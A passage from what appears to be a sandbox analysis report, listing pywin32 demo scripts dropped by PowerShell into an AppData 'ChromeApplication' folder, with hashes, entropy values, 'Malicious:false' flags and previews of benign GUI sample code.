                                                                                                                                                                                                  SHA-256:EE25D0EC53230BFBC717F191530D1CEE7EC3219D2623C7372139A427F86EC6CB
                                                                                                                                                                                                  SHA-512:EECA8346C3D65E5BB45B13DDCE001BA319D7EAB078F7F76E3EC767E340B93BA2A47FB6B3EB4416CA5202157B02FA3B9ECB0EDC9DDBEA43631404621F90005B44
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo which creates a view and a frame which displays a PPM format bitmap.#.# This hasnnt been run in a while, as I dont have many of that format around!..import win32api.import win32con.import win32ui...class DIBView:. def __init__(self, doc, dib):. self.dib = dib. self.view = win32ui.CreateView(doc). self.width = self.height = 0. # set up message handlers. # ..self.view.OnPrepareDC = self.OnPrepareDC. self.view.HookMessage(self.OnSize, win32con.WM_SIZE).. def OnSize(self, params):. lParam = params[3]. self.width = win32api.LOWORD(lParam). self.height = win32api.HIWORD(lParam).. def OnDraw(self, ob, dc):. # set sizes used for "non strecth" mode.. self.view.SetScrollSizes(win32con.MM_TEXT, self.dib.GetSize()). dibSize = self.dib.GetSize(). dibRect = (0, 0, dibSize[0], dibSize[1]). # stretch BMP.. # self.dib.Paint(dc, (0,0,self.width, self.height),dibRect). # non s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\dlgtest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4574
                                                                                                                                                                                                  Entropy (8bit):4.90853148325504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:VyZpdD4ZyBMuDVv2n65x5yy04esYX1GaKJPT:84ZCM09G+iTKJPT
                                                                                                                                                                                                  MD5:4A63AE2B6A65373F1092B910B69CF62C
                                                                                                                                                                                                  SHA1:ABAF62EE2CBB8E0C5F420CEBB641752CFC34F3BD
                                                                                                                                                                                                  SHA-256:851EC7CB72ADE79088ED54C018AD4A976AA2A82BB201CCB603C592023D529319
                                                                                                                                                                                                  SHA-512:DD4408B6FC46C4C0BC02818D1E6B4BAD0CC4F8E23788B60FF82FC33F4E17143C6AF48228823570D0EC57082B7F8198F517E144700E55E5C094CBFB361D34E698
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A Demo of Pythonwin's Dialog and Property Page support...###################.#.# First demo - use the built-in to Pythonwin "Tab Stop" dialog, but.# customise it heavily..#.# ID's for the tabstop dialog - out test..#.import win32con.import win32ui.from pywin.mfc import dialog.from win32con import IDCANCEL.from win32ui import IDC_EDIT_TABS, IDC_PROMPT_TABS, IDD_SET_TABSTOPS...class TestDialog(dialog.Dialog):. def __init__(self, modal=1):. dialog.Dialog.__init__(self, IDD_SET_TABSTOPS). self.counter = 0. if modal:. self.DoModal(). else:. self.CreateWindow().. def OnInitDialog(self):. # Set the caption of the dialog itself.. self.SetWindowText("Used to be Tab Stops!"). # Get a child control, remember it, and change its text.. self.edit = self.GetDlgItem(IDC_EDIT_TABS) # the text box.. self.edit.SetWindowText("Test"). # Hook a Windows message for the dialog.. self.edit.HookMessage(se

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\dyndlg.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2829
                                                                                                                                                                                                  Entropy (8bit):5.242178972131811
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:fmzWPx3GuGsTqAT1hqliPcgsgjPLGq5dIOGD1w5uyrN9w3dvHqAV5xmGbz8:+zm4uGP5JqTGqF5BHqZ5xmY8
                                                                                                                                                                                                  MD5:6649A11465ACC00ECBE64D50034B5281
                                                                                                                                                                                                  SHA1:11490980CF7A94A268674A413406C451877E288F
                                                                                                                                                                                                  SHA-256:1277E4F1754310D687BF685CA33B626E04929EFE3F354FDD9081B1EF8F7C766F
                                                                                                                                                                                                  SHA-512:DDFB2DF458741CF40BF1FFA1D6572E5D7E488F16D5759003B8752B71AC2B1296F70620E9615A458D6DCC3E7C0C3EBB31E68D7C18293D2684A1B434C8804271D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# dyndlg.py.# contributed by Curt Hagenlocher <chi@earthlink.net>..# Dialog Template params:.# .Parameter 0 - Window caption.# .Parameter 1 - Bounds (rect tuple).# .Parameter 2 - Window style.# .Parameter 3 - Extended style.# .Parameter 4 - Font tuple.# .Parameter 5 - Menu name.# .Parameter 6 - Window class.# Dialog item params:.# .Parameter 0 - Window class.# .Parameter 1 - Text.# .Parameter 2 - ID.# .Parameter 3 - Bounds.# .Parameter 4 - Style.# .Parameter 5 - Extended style.# .Parameter 6 - Extra data...import win32con.import win32ui.from pywin.mfc import dialog, window...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Select Warehouse", (0, 0, 177, 93), style, None, (8, "MS Sans Serif")],. ]. dlg.append([130, "Current Warehouse:", -1,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\fontdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2759
                                                                                                                                                                                                  Entropy (8bit):4.974631778635262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:74tR9wr5J+Vs3x95vgQppI4OyaL/1I4t7T/tcD+jHgMzC:MR9mc2XZ1pIFtDy4pT/tzjHVzC
                                                                                                                                                                                                  MD5:EC4DFE4E14541E236CB0ED2C6EF45C45
                                                                                                                                                                                                  SHA1:527BCD37188373C6C903B532A9E2B94D4738799E
                                                                                                                                                                                                  SHA-256:566ED0C5460B8591E49788F20E60F716F6BDE99F497DAF9CB8A172C101D1C586
                                                                                                                                                                                                  SHA-512:4F5125D4C755C725FA448369E1EA5DF0444D527B03A39E140E7EE6184AF8EAC7AC5920DDF794A0C1AD14FD0ABB9F2DC6117D03234A8F8D54C559832B751E48EB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demo of Generic document windows, DC, and Font usage.# by Dave Brennan (brennan@hal.com)..# usage examples:..# >>> from fontdemo import *.# >>> d = FontDemo('Hello, Python').# >>> f1 = { 'name':'Arial', 'height':36, 'weight':win32con.FW_BOLD}.# >>> d.SetFont(f1).# >>> f2 = {'name':'Courier New', 'height':24, 'italic':1}.# >>> d.SetFont (f2)..import win32api.import win32con.import win32ui.from pywin.mfc import docview..# font is a dictionary in which the following elements matter:.# (the best matching font to supplied parameters is returned).# name..string name of the font as known by Windows.# size..point size of font in logical units.# weight..weight of font (win32con.FW_NORMAL, win32con.FW_BOLD).# italic..boolean; true if set to anything but None.# underline.boolean; true if set to anything but None...class FontView(docview.ScrollView):. def __init__(. self, doc, text="Python Rules!", font_spec={"name": "Arial", "height": 42}. ):. docview.ScrollView.__

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\guidemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2709
                                                                                                                                                                                                  Entropy (8bit):4.491038307415068
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:0kg2g3zeqdFSLlcMGfmTeg24Kjvx3RRV6Wwn:hgfRcca92PvxbVwn
                                                                                                                                                                                                  MD5:52EA743C9A5F7CFCC05CF59610DF6422
                                                                                                                                                                                                  SHA1:83D3CB7B21E5B5C07B24A947F53240A42A9529BF
                                                                                                                                                                                                  SHA-256:23AE39A4E5BE89FA81F2DF290AC79BF83C4A2D24026D81EDCCBB3474E5E3EE71
                                                                                                                                                                                                  SHA-512:44CE3E58DF0A4395C6359176EFBE8D731D64DD6EA55442B443FEF270EB5DD03860A661EA664CC4C4907447C365363E47375EDCF9AB0967F398AF9FC42F96E331
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# GUI Demo - just a worker script to invoke all the other demo/test scripts..import sys..import __main__.import regutil.import win32api.import win32ui..demos = [ # .('Font', 'import fontdemo;fontdemo.FontDemo()'),. ("Open GL Demo", "import openGLDemo;openGLDemo.test()"),. ("Threaded GUI", "import threadedgui;threadedgui.ThreadedDemo()"),. ("Tree View Demo", "import hiertest;hiertest.demoboth()"),. ("3-Way Splitter Window", "import splittst;splittst.demo()"),. ("Custom Toolbars and Tooltips", "import toolbar;toolbar.test()"),. ("Progress Bar", "import progressbar;progressbar.demo()"),. ("Slider Control", "import sliderdemo;sliderdemo.demo()"),. ("Dynamic window creation", "import createwin;createwin.demo()"),. ("Various Dialog demos", "import dlgtest;dlgtest.demo()"),. ("OCX Control Demo", "from ocx import ocxtest;ocxtest.demo()"),. ("OCX Serial Port Demo", "from ocx import ocxserialtest;.ocxserialtest.test()"),. (. "IE4 Control Demo",.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\hiertest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3766
                                                                                                                                                                                                  Entropy (8bit):4.7759365871499115
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:tAvEDSXSimgEb36/O2W9NebOVQOVDsEuExIczHUQ:tWE7/mJWreyNdxf0Q
                                                                                                                                                                                                  MD5:27345B318FAE042B9638336FAB47DC65
                                                                                                                                                                                                  SHA1:ACEB5D20D5E013458366D1EFF0BEFC25E6DF3E0E
                                                                                                                                                                                                  SHA-256:5002F752137A85F1EAD040A6B763F6B1B18D159E19CDF618CAEC411D1DA2D6C0
                                                                                                                                                                                                  SHA-512:7D6198D2D03764F3C12CE796DB74532B0930107409E832879AD20F9765334BFF34CD20E6DF34C8BB69348648476436AE1660F699D97890FA3C23FC4011849C63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import commctrl.import win32ui.from pywin.mfc import docview, window.from pywin.tools import hierlist...# directory listbox.# This has obvious limitations - doesnt track subdirs, etc. Demonstrates.# simple use of Python code for querying the tree as needed..# Only use strings, and lists of strings (from curdir()).class DirHierList(hierlist.HierList):. def __init__(self, root, listBoxID=win32ui.IDC_LIST1):. hierlist.HierList.__init__(self, root, win32ui.IDB_HIERFOLDERS, listBoxID).. def GetText(self, item):. return os.path.basename(item).. def GetSubList(self, item):. if os.path.isdir(item):. ret = [os.path.join(item, fname) for fname in os.listdir(item)]. else:. ret = None. return ret.. # if the item is a dir, it is expandable.. def IsExpandable(self, item):. return os.path.isdir(item).. def GetSelectedBitmapColumn(self, item):. return self.GetBitmapColumn(item) + 6 # Use different col

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\menutest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):490
                                                                                                                                                                                                  Entropy (8bit):4.790457084981066
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:Sq3VGrAF3xMjLmJVwUXYQ3EAjpAeoQbk/AIL/hXwlfNI6lmH4yHFS31l0rcb5b+1:JUk4LmbLU2pJxIIIThPGo41ldx+1
                                                                                                                                                                                                  MD5:B85C91F60CCD40AFA34E217F6C730DEB
                                                                                                                                                                                                  SHA1:4254190DC95206CD2DE7DC75E0A11844D623B862
                                                                                                                                                                                                  SHA-256:9B32896D9931F16907578519A48A5172BA8F257D64F65C41C327ACF1948DB1D8
                                                                                                                                                                                                  SHA-512:7EDA504EFF850B8784A862353532F8DEAFFBE742DE7840C55600561C907202300237702217840CB8E3D381FAFC19A791960B37213942413BDF34A4CDD05DD93F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Run this as a python script, to gray "close" off the edit window system menu..import win32con.from pywin.framework import interact..if __name__ == "__main__":. import demoutils.. if demoutils.NeedGoodGUI():. win = interact.edit.currentView.GetParent(). menu = win.GetSystemMenu(). id = menu.GetMenuItemID(6). menu.EnableMenuItem(id, win32con.MF_BYCOMMAND | win32con.MF_GRAYED). print("The interactive window's 'Close' menu item is now disabled.").

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\objdoc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1727
                                                                                                                                                                                                  Entropy (8bit):4.598187757077594
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:qGpxE2ahvgtBXKTAESwAHplowG/hfMLy+FLjbABS/AYmXDf8b0zaFlBpJn:Rpxba0KTMwIpvG/9+tjbv/1qmFlB/n
                                                                                                                                                                                                  MD5:9EF7E46AFDD9638F0B839B9A5CB199D4
                                                                                                                                                                                                  SHA1:D0E85A815263617BDDB74084BDAD38D8B36153C0
                                                                                                                                                                                                  SHA-256:BE40CA9EB9BFDDF7D3B6B506E8E11E22746BC9A970ED1705B873F871968CBCBC
                                                                                                                                                                                                  SHA-512:9F377F2ECB233A826EECC7008848C7AD4BA2A171A57E33F85F002D8E2EC65A8111F35B8A68E7CE2333A7AB7D59B2975042203980602BF936AA034F8A19493878
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a sample file, and shows the basic framework for using an "Object" based.# document, rather than a "filename" based document..# This is referenced by the Pythonwin .html documentation...# In the example below, the OpenObject() method is used instead of OpenDocumentFile,.# and all the core MFC document open functionality is retained...import win32ui.from pywin.mfc import docview...class object_template(docview.DocTemplate):. def __init__(self):. docview.DocTemplate.__init__(self, None, None, None, object_view).. def OpenObject(self, object): # Use this instead of OpenDocumentFile.. # Look for existing open document. for doc in self.GetDocumentList():. print("document is ", doc). if doc.object is object:. doc.GetFirstView().ActivateFrame(). return doc. # not found - new one.. doc = object_document(self, object). frame = self.CreateNewFrame(doc). doc.OnNewDocument().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\demoutils.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1501
                                                                                                                                                                                                  Entropy (8bit):4.880256056364068
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpb:zg7RHNYacPSia0LcbsoYY1Amt
                                                                                                                                                                                                  MD5:EA40A2E7FA0D59B4FBA8E17624001F16
                                                                                                                                                                                                  SHA1:4AB2487C5DE2CF2787F744CBF43B6679F008AFDF
                                                                                                                                                                                                  SHA-256:98C8D8EFCA13834E1C7288BE825DBFB5165E0D00BDD25E22123147ED63A757E8
                                                                                                                                                                                                  SHA-512:C2B9FC28E717FE17A5F99B2B78AFB2B4489A76F964F984C35227D4A25927660D5140333E5C4AEAA201074B45FC2A4A64C036340394E64C5F7ADBCCECF52CFAB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\flash.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3019
                                                                                                                                                                                                  Entropy (8bit):4.928109370801704
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:EI3lvFKgppcWFkRC2Y5icp7SBpsHOPQoOL4w1YzBBgVCi6jgIPOUhVA5Os+YpsuW:EMsgpPx5Rp7ypUOIzLNaVs76jgI2J5OT
                                                                                                                                                                                                  MD5:8EB47FD8B69A81F278B4ABE11DC245FD
                                                                                                                                                                                                  SHA1:72E0F17EE9D8AE16D436E26459F4743B0CB28D96
                                                                                                                                                                                                  SHA-256:46B673EBB38C49A54880E80C2393A8CDC1E624876DF3BE579ACF50695A68B62D
                                                                                                                                                                                                  SHA-512:C38B67626D233229A089F1FB1DF0F25882173D59637D3151CC6143DBD41E454BC5A35A52664E64B0FF40DF538E88E5C9D3D57E5F60FF2662A4A5F99BEC1CA142
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# By Bradley Schatz.# simple flash/python application demonstrating bidirectional.# communicaion between flash and python. Click the sphere to see.# behavior. Uses Bounce.swf from FlashBounce.zip, available from.# http://pages.cpsc.ucalgary.ca/~saul/vb_examples/tutorial12/..# Update to the path of the .swf file (note it could be a true URL).flash_url = "c:\\bounce.swf"..import sys..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import activex, window.from win32com.client import gencache..FlashModule = gencache.EnsureModule("{D27CDB6B-AE6D-11CF-96B8-444553540000}", 0, 1, 0)..if FlashModule is None:. raise ImportError("Flash does not appear to be installed.")...class MyFlashComponent(activex.Control, FlashModule.ShockwaveFlash):. def __init__(self):. activex.Control.__init__(self). FlashModule.ShockwaveFlash.__init__(self). self.x = 50. self.y = 50. self.angle = 30. self.started = 0.. def OnFSCommand(self, c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\msoffice.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5048
                                                                                                                                                                                                  Entropy (8bit):4.781620280031484
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:i6/+MX858voTQg3Uzk29LYWu2VuiAKMebC6IzKHc5Yp1PIEsuI:JA5QHhYWu+A2Cxip5IoI
                                                                                                                                                                                                  MD5:4374102AE9A00E5C51450DF55F17BD17
                                                                                                                                                                                                  SHA1:19B9B8347066EB7F01194EE7FB2EBF700BCD0762
                                                                                                                                                                                                  SHA-256:A23CF5E8F0DAE332035DD1081B32A7DDBC0BD697DB1A68EDAB52B0FAC25B3BF7
                                                                                                                                                                                                  SHA-512:03CF3052789CA0A6BC05C8B02950A2B0EE4B0EB1EFE599D4008DF6BE1C502A6E79F8A57F9ECE082685310914F863F8A1204443276E1120BA9A9A48421DDEFA68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This demo uses some of the Microsoft Office components..#.# It was taken from an MSDN article showing how to embed excel..# It is not comlpete yet, but it _does_ show an Excel spreadsheet in a frame!.#..import regutil.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, docview, object, window.from win32com.client import gencache..# WordModule = gencache.EnsureModule('{00020905-0000-0000-C000-000000000046}', 1033, 8, 0).# if WordModule is None:.# .raise ImportError, "Microsoft Word version 8 does not appear to be installed."...class OleClientItem(object.CmdTarget):. def __init__(self, doc):. object.CmdTarget.__init__(self, win32uiole.CreateOleClientItem(doc)).. def OnGetItemPosition(self):. # For now return a hard-coded rect.. return (10, 10, 210, 210).. def OnActivate(self):. # Allow only one inplace activate item per frame. view = self.GetActiveView(). item = self.GetDocument().GetInPlaceActiveItem(view).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\ocxserialtest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3611
                                                                                                                                                                                                  Entropy (8bit):4.749470057382686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:JG/qBKrkDETqAT1hqmiaLvXWNKcqMjpoKFuKbpIV7UC/RpIiC5KHrZN/UZ/CH7u:w/XqEnv6KxS/FuKbpAUNKVNs/CHS
                                                                                                                                                                                                  MD5:08EC418B44BDC4D47C8EBEF15421B891
                                                                                                                                                                                                  SHA1:088CCBD0F7EC44ABF192129F3864ADBE41C35B63
                                                                                                                                                                                                  SHA-256:694A4B0C8CC306559242C2973FFF638AFC13848E9AB49C6D213581010EDC5591
                                                                                                                                                                                                  SHA-512:4F26F2F8C3FCFE4A1D7FDC0CF60D319E7590D8993CCF37FBFE755D7E37CE779453A6341E30AF7BEA6924634232269CBA792A248536988E8A82CDDFC82CB483CD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ocxserialtest.py.#.# Sample that uses the mscomm OCX to talk to a serial.# device...# Very simple - queries a modem for ATI responses..import pythoncom.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog.from win32com.client import gencache..SERIAL_SETTINGS = "19200,n,8,1".SERIAL_PORT = 2..win32ui.DoWaitCursor(1).serialModule = gencache.EnsureModule("{648A5603-2C6E-101B-82B6-000000000014}", 0, 1, 1).win32ui.DoWaitCursor(0).if serialModule is None:. raise ImportError("MS COMM Control does not appear to be installed on the PC")...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Very Basic Terminal", (0, 0, 350, 180), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. dlg.append(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\ocxtest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6805
                                                                                                                                                                                                  Entropy (8bit):4.779699424357507
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:85MiGinGqzC9//qIV4dKwvwjZUMIv3KISiKyvb6gJ5c5YpL14gDY/kT:8SilkAIjZMvhDyipJ4gDY/kT
                                                                                                                                                                                                  MD5:455C39408751DF999C31ED6F3FE9F254
                                                                                                                                                                                                  SHA1:7F6508DE9C98BC42B98ACB16E0AB22205A4092ED
                                                                                                                                                                                                  SHA-256:C8029BF8681AF4253E8438B6BAC35C4882E38613CA0540AF64CF47B532F55A94
                                                                                                                                                                                                  SHA-512:97A4F7543C23C8907347360B8598E866935B8D3287FFF12BFEDBF86B786704DE1B72259DAD85037D41E4F1DCE84CEB8B0C45F12A322A0723E9756B89F4A2CBDA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# OCX Tester for Pythonwin.#.# This file _is_ ready to run. All that is required is that the OCXs being tested.# are installed on your machine..#.# The .py files behind the OCXs will be automatically generated and imported...import glob.import os..import win32api.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog, window.from win32com.client import gencache...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["OCX Demos", (0, 0, 350, 350), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. # .dlg.append([131, None, 130, (5, 40, 110, 48),. # ..s | win32con.LBS_NOTIFY | win32con.LBS_SORT | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL | win32con.WS_BORDER]). # .dlg.append(["{

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\ocx\webbrowser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2293
                                                                                                                                                                                                  Entropy (8bit):4.965254916940284
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8Snml4kgp+QLkRNSKWyi6jgIYlOUhVA5Os+YpHdVfjs+YpFHTzbPrcI:8mmqkgp/MsL6jgIZJ5O5Ypjj5YpFHHbz
                                                                                                                                                                                                  MD5:11E0E9DCB09236A30FC93183311B3715
                                                                                                                                                                                                  SHA1:BDC80B51387F688765CE47B51DF49F030097BDDA
                                                                                                                                                                                                  SHA-256:DD4009EB857380EF985C4B3949F46B979782DCF33451A4C323296880A02380C1
                                                                                                                                                                                                  SHA-512:F8B8BE06C7F48DCC1028C019A5CCF68E50471D18CD0082CE56C6443C96151F941E090EF50C1A72B2B5313D967A182A970DBF1303A0BD9418BD2E96B88F45E2D4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This demo uses the IE4 Web Browser control...# It catches an "OnNavigate" event, and updates the frame title..# (event stuff by Neil Hodgson)..import sys..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import activex, window.from win32com.client import gencache..WebBrowserModule = gencache.EnsureModule(. "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}", 0, 1, 1.).if WebBrowserModule is None:. raise ImportError("IE4 does not appear to be installed.")...class MyWebBrowser(activex.Control, WebBrowserModule.WebBrowser):. def OnBeforeNavigate2(. self, pDisp, URL, Flags, TargetFrameName, PostData, Headers, Cancel. ):. self.GetParent().OnNavigate(URL). # print "BeforeNavigate2", pDisp, URL, Flags, TargetFrameName, PostData, Headers, Cancel...class BrowserFrame(window.MDIChildWnd):. def __init__(self, url=None):. if url is None:. self.url = regutil.GetRegisteredHelpFile("Main Python Documentation"). if sel

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\openGLDemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9789
                                                                                                                                                                                                  Entropy (8bit):4.91335626349889
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:uBDIizYdIFW8DVmzCqLiyH0Sy1gUhEH3zKhOntDD4O6VkjhOn2lWDiMoc2+SEWM6:uBDIizp1DVmzCakhceADs6BlWDnEtX
                                                                                                                                                                                                  MD5:D648E38AC8E7A16233B148A450658DD0
                                                                                                                                                                                                  SHA1:F7254260716A0D935347EC59A9FE481AB01AA9AF
                                                                                                                                                                                                  SHA-256:F5F8C95CF4E03CCED246038AF998635858E6EBF4676C8D71AD36E79850888248
                                                                                                                                                                                                  SHA-512:1ABCAB396FBACBC7E83F1A96C33D624AD55989A925A741778EDA5D4574D2C0DBBF662CD897C4F19B8DD7B2F55BFF89C5379FCEEAC645CC1E57AC3EDBC3AFF6BC
                                                                                                                                                                                                  Malicious:false
